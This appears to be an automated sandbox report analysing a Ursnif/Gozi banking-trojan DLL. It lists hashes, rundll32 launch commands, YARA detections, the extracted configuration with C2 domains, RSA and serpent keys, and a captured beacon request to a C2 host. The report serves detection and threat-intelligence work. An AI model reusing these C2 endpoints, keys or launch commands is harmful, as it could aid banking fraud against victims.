Play interactive tour

Edit tour

Analysis Report presentation.dll

Overview

General Information

Sample Name:	presentation.dll
Analysis ID:	404837
MD5:	9debcd929765390555ca123c0076eea4
SHA1:	d0c68d1d874a877dbbbce1fea0bb164c6bdad642
SHA256:	9969cfd81612d1efbc5e983b57ff2fa2a69a3f6a6812c6da8382bf0c22014cf4
Tags:	gozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5564 cmdline: loaddll32.exe 'C:\Users\user\Desktop\presentation.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5608 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1004 cmdline: rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 204 cmdline: rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4152 cmdline: rundll32.exe C:\Users\user\Desktop\presentation.dll,Might MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 4784 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5260 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 1004	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
5.3.rundll32.exe.3468d29.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.4828d29.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.6d640000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.3.loaddll32.exe.14c8d29.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.6d640000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.2ee8d29.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.3.rundll32.exe.3468d29.0.raw.unpack

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Source: presentation.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:

Binary string: c:\Friend\507\123\Rol\well W\Flower.pdb source: presentation.dll

Source: global traffic

HTTP traffic detected: GET /bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FUVq6FVw/212_2Fmya7wvf6qm5/W9P25GOkXEp_/2B7Ii5Reomx/DNGUxpOts5V_2F/m1ZCLgb0yZELhr1HDh2za/sK1pwrtT_2FYeJvy/UKI9xt8zwa55YYh/KZ8_2FX9rMmmJgeD_2/F8QbTyDtN/gF0rE8FYow3_2Fnp33aS/fsqd8_2FyHPS0_2Bp5_/2FbtiZGb31ZO5pN2ppiKul/1QXBqN9S9lxCI/vSq83RG3/yyRImlzN5vRP_2Bwx60Qoqa/1yNTVkSL_2Bp8is/j0c4aw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: app.buboleinov.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 May 2021 10:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {93F744B3-ADDB-11EB-90E6-ECF4BB82F7E0}.dat.21.dr, ~DF615A7858A33FDD4B.TMP.21.dr

String found in binary or memory: http://app.buboleinov.com/bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FU

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642485 NtQueryVirtualMemory,	1_2_6D642485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6418D1 GetProcAddress,NtCreateSection,memset,	4_2_6D6418D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D641B89 NtMapViewOfSection,	4_2_6D641B89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642485 NtQueryVirtualMemory,	4_2_6D642485

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642264	1_2_6D642264
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D67FCA8	1_2_6D67FCA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D67495A	1_2_6D67495A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642264	4_2_6D642264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D67FCA8	4_2_6D67FCA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D67495A	4_2_6D67495A

Source: presentation.dll

Binary or memory string: OriginalFilenameFlower.dll8 vs presentation.dll

Source: presentation.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@12/13@1/1

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{93F744B1-ADDB-11EB-90E6-ECF4BB82F7E0}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DFE183529A9C549E1C.TMP

Jump to behavior

Source: presentation.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\presentation.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Might
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Hadlaw	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\presentation.dll,Might	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4784 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: presentation.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: presentation.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\Friend\507\123\Rol\well W\Flower.pdb source: presentation.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D641F31 LoadLibraryA,GetProcAddress,

1_2_6D641F31

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642253 push ecx; ret	1_2_6D642263
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D642200 push ecx; ret	1_2_6D642209
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D64FD65 push FFFFFF88h; ret	1_2_6D64FD71
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D651D31 push eax; iretd	1_2_6D651D5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D651C4E push ebx; iretd	1_2_6D651C4F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D650C3D push ds; iretd	1_2_6D650C49
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D650671 push esp; iretd	1_2_6D650689
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D65061E push esp; iretd	1_2_6D650689
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D6510C6 push ecx; ret	1_2_6D6510CE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D654B4C push 45C295E6h; retf	1_2_6D654B51
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D65534C push FFFFFFA4h; retf	1_2_6D65534F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D655B13 pushfd ; retf	1_2_6D655B75
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D6753C5 push ecx; ret	1_2_6D6753D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68F0C5 push cs; iretd	1_2_6D68F0CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68FB2F push ebp; iretd	1_2_6D68FB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642253 push ecx; ret	4_2_6D642263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D642200 push ecx; ret	4_2_6D642209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D64FD65 push FFFFFF88h; ret	4_2_6D64FD71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D651D31 push eax; iretd	4_2_6D651D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D651C4E push ebx; iretd	4_2_6D651C4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D650C3D push ds; iretd	4_2_6D650C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65649F push ecx; retf	4_2_6D656509
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D650671 push esp; iretd	4_2_6D650689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65061E push esp; iretd	4_2_6D650689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D656101 push eax; ret	4_2_6D656108
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65700C push es; iretd	4_2_6D657012
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6510C6 push ecx; ret	4_2_6D6510CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D654B4C push 45C295E6h; retf	4_2_6D654B51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D65534C push FFFFFFA4h; retf	4_2_6D65534F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D655B13 pushfd ; retf	4_2_6D655B75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D6753C5 push ecx; ret	4_2_6D6753D8

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D641F31 LoadLibraryA,GetProcAddress,

1_2_6D641F31

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68D1A5 mov eax, dword ptr fs:[00000030h]	1_2_6D68D1A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68CCE2 push dword ptr fs:[00000030h]	1_2_6D68CCE2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D68D0DB mov eax, dword ptr fs:[00000030h]	1_2_6D68D0DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68D1A5 mov eax, dword ptr fs:[00000030h]	4_2_6D68D1A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68CCE2 push dword ptr fs:[00000030h]	4_2_6D68CCE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6D68D0DB mov eax, dword ptr fs:[00000030h]	4_2_6D68D0DB

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\presentation.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.512558704.0000000001A00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.513768964.00000000034D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	1_2_6D641566
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_6D67BDC3
Source: C:\Windows\System32\loaddll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	1_2_6D67C4D0
